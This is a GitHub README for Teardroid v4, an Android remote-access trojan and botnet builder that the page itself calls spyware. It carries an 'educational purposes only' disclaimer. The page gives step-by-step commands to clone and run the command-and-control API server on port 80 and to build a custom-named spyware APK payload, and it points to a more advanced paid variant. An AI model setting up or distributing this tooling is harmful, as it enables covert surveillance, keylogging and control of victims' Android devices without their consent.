ScRiPt1337 / Teardroid-phprat

:india: :robot: It's easy to use android botnet work without port forwarding, vps and android studio
https://scatter.sellup.io
MIT License
813 stars 312 forks source link
android-botnet android-exploitation android-malware android-pentesting android-rat bot botnet hacking hacking-tool keylogger post-exploitation rat

:warning:Disclaimer : This software is meant for educational purposes only. I'm not responsible for any malicious use of the app.

:robot: Teardroid v4

Screenshot

🇮🇳 It's easy to use android botnet work without port forwarding, vps and android studio

GitHub issues Twitter Hacksec visitors

:rocket: Features

:warning: Requirement

Java version i used

$ java -version
openjdk version "11.0.13" 2021-10-19
OpenJDK Runtime Environment (build 11.0.13+8)
OpenJDK 64-Bit Server VM (build 11.0.13+8, mixed mode)

Tested on

Run control panel on your own server (recommended)

$ git clone https://github.com/ScRiPt1337/Teardroidv4_api
$ sudo apt-get install uvicorn
$ sudo apt-get install python3
$ sudo apt-get install python3-pip
$ python3 -m pip install uvicorn
$ cd Teardroidv4_api
$ pip install -r requirements.txt
$ nano ./db/database.py
from deta import Deta
from os import getenv

deta = Deta(getenv("DETA_PROJECT_KEY")) => deta =  Deta("demo project key")
# replace getenv("DETA_PROJECT_KEY") with your deta.sh project key
# make sure your remove getenv
$ screen
# press enter to go inside the screen session
$ uvicorn main:app --host 0.0.0.0 --port 80
# now close your terminal windows  and we are good to go

How to setup the builder ( generate apk payload )

$ git clone https://github.com/ScRiPt1337/Teardroid-phprat
$ pip install -r requirements.txt
$ python Teardroid.py
[+] Checking Python Version
[+] Python Version : 3.10 ✓
  ______                    __           _     __         __ __
 /_  __/__  ____ __________/ /________  (_)___/ /  _   __/ // /
  / / / _ \/ __ `/ ___/ __  / ___/ __ \/ / __  /  | | / / // /_
 / / /  __/ /_/ / /  / /_/ / /  / /_/ / / /_/ /   | |/ /__  __/
/_/  \___/\__,_/_/   \__,_/_/   \____/_/\__,_/    |___/  /_/

Teardroid v4.0 - A tool to build teardroid spyware for Android devices. 🕷
Contact us : https://t.me/script1337 🚀
usage: Teardroid.py [-h] [-v] [-b]

options:
  -h, --help     show this help message and exit
  -v, --version  Version of Teardroid 🥴
  -b , --build   Build Teardroid with custom name [ex: Teardroid.py -b teardroid] 😷
$ python Teardroid.py -b your_app_name

Note for macOS

Dashboard

IMPORTANT NOTICE

Screenshot

Need something more advanced try ( scatter alfa )

Contact info